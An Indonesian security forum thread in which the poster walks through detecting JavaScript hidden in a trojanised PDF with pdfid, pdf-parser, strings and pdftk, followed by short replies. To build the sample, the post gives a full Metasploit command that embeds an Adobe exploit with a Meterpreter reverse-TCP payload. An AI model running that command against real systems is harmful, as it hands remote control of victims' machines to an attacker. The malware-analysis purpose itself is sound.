Share Analysis PDF file contains a trojan - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Malware - Malicious Software (https://www.indonesianbacktrack.or.id/forum/forum-151.html) +--- Thread: Share Analysis PDF file contains a trojan (/thread-5597.html) Pages:
1
2
|
Analysis PDF file contains a trojan - [H2] - 02-05-2014 Introduction !!! Pada kesempatan ini saya akan menulis beberapa tahapan bagaimana menganalisa file dokumen *.PDF untuk menentukan Apakah dokumen tersebut berbahaya atau tidak. Hal ini terjadi beberapa waktu lalu ketika saya mencoba untuk men-download sebuah e-book dan kemudian file tersebut terdeteksi oleh anti-virus yang saya gunakan. ini membuat saya menjadi curiga dan kemudian saya mencoba untuk menganalisa dokumen tersebut. berikut beberapa langkah yang saya lakukan untuk menganalisis. Saya akan melakukan perbandingan antara dokumen PDF yang bersih dengan dokumen yg di bungkus oleh trojan Equipment : 1. pdfid 2. pdf-parser 3. pdftk. 'apt-get install pdftk' 4. strings press thanks button [hide] pada tahap pertama saya akan menganalisa dokumen "analysis.pdf" yang tidak disisipi oleh trojan. Spoiler! :
OK, now let's go it! langkah pertamana untuk menampilkan value yang ada serta bahasa pendukung yang di munculkan dari dokumen diatas Code: # pdfid analysis.pdf Spoiler! :
terlihat dari output yang ditampilkan kita hanya perlu memperhatikan baris JS / Java Script. diatas menunjukkan bahwa dokumen tersebut bebas dari adanya penyisipan trojan. terbukti nilai yang ditampilkan pada baris JS / Java Script adalah "0" berarti tidak ada text atau perintah dengan menggunakan script java. jadi, itu berarti kita tidak perlu menganalisis lebih lanjut maka mari kita coba untuk menganalisa dokumen yang berisi trojan, dan di sini saya menggunakan metasploit untuk memanipulasi trojan menjadi dokumen pdf Code: # msfcli exploit/windows/browser/adobe_media_newplayer PAYLOAD=windows/meterpreter/reverse_tcp SRVHOST=192.168.1.3 SRVPORT=4455 URIPATH=/ LHOST=192.168.1.3 LPORT=4444 E Spoiler! :
selanjutnya mendownload file tersebut. Spoiler! :
pada gambar diatas terlihat versi yang di gunakan metasploit untuk membuat file *.pdf adalah versi 1.5. selanjutnya melakukan hal yang sama pada tahap sebelumnya menggunakan perintah "pdfid" Code: # pdfid trojanPDF.pdf Spoiler! :
terlihat pada baris JS/JavaScript memiliki value "1" yang berarti dalam dokumen tersebut terdapat perintah atau text menggunakan JavaScript. selanjutnya menggunakan perintah "strings" untuk melihat JavaScript dalam bentuk text. Code: # strings trojanPDF.pdf Spoiler! :
output pada gambar diatas terlihat tidak adanya JavaScript yang muncul dalam bentuk teks, ini mungkin merupakan upaya metasploit untuk mengenkripsi text java tersebut agar tidak mudah di temukan, hmm i like metasploit next, parse the PDF document Code: # pdf-parser -f trojanPDF.pdf Spoiler! :
perintah diatas juga tidak bisa menemukan adanya baris Java Script. metasploit benar2 mengenkripsikan code tersebut upaya mempersulit analysis. salut deh buat metasploit >_< tidak hanya sampai disini, berikut cara terakhir yang saya gunakan. Di sini saya akan membuat duplikate dokumen dan menghapus semua pengkodean dokumen "trojanPDF.pdf" dan menyalinnya ke dokumen baru dengan nama "trojanPDF-2.pdf" Code: # pdftk trojanPDF.pdf output trojanPDF-2.pdf uncompress Spoiler! :
setelah duplicate berhasil kita buat, kemudian gunakan perintah "strings" untuk menampilkan tampilan dokumen yg akan kita cetak. Code: # strings trojanPDF-2.pdf Spoiler! :
yuhuuu, berhasil text java script berhasil muncul dan jelas terlihat bahwa dokumen diatas memiliki infeksi trojan -_-" # saran = hati-hati kalau mau download e-book apalagi dari sumber yang tidak jelas source [/hide] Regards IBTeam Moved to: / Attacker Zone / Malware - Malicious Software v / Share - Analysis PDF file contains a trojan by iKONs RE: Share - Analysis PDF file contains a trojan - xsteganography - 02-05-2014 Mantap ... Mau Ke TKP Dulu Praktek .... RE: Share - Analysis PDF file contains a trojan - [H2] - 02-05-2014 (02-05-2014, 07:49 PM)xsteganography Wrote: Mantap ... Mau Ke TKP Dulu Praktek .... iya bang, langsung aja test satu2 e-book yang ada di simpen @iKONspirasi hehehe iya om, tadi sempet bingung juga sih mau naruk di mana makasih om RE: Analysis PDF file contains a trojan - zee eichel - 02-06-2014 nice one bro .. +2 rep ... ini sangat berguna untuk berjaga2 dari serangan trojan atau malware .. keep share bro RE: Analysis PDF file contains a trojan - [H2] - 02-06-2014 (02-06-2014, 05:02 PM)zee eichel Wrote: nice one bro .. +2 rep ... ini sangat berguna untuk berjaga2 dari serangan trojan atau malware .. keep share bro thanks bro mimin cendol di terima RE: Analysis PDF file contains a trojan - san7 - 04-20-2014 ane baru tahu selain peepdf juga ada pdfid RE: Analysis PDF file contains a trojan - iKONspirasi - 04-20-2014 wah pdftk buat uncompress pdf biar bisa decode kode yg disembunyikan, keren bro +1 dari gw RE: Analysis PDF file contains a trojan - [H2] - 04-20-2014 (04-20-2014, 06:03 PM)iKONspirasi Wrote: wah pdftk buat uncompress pdf biar bisa decode kode yg disembunyikan, keren bro thanks om iKon RE: Analysis PDF file contains a trojan - Jeriko - 12-22-2015 Thanks info nya, ane baru tau PDF bisa disisipin trojan, tadi nya ane kira aman -_- RE: Analysis PDF file contains a trojan - anongep8 - 12-25-2015 maaf om melenceng ^_^ , saya pake ubuntu 14.04.3 LTS , udh saya install metasploit framework terbaru, tapi waktu saya jalankan msfcli terjadi eror seperti ini [ http://prntscr.com/9iahpz ] , sudah saya cari solusi di forum ubuntu tidak ada, mohon bantuan'nya mas ^_^ #Thanks |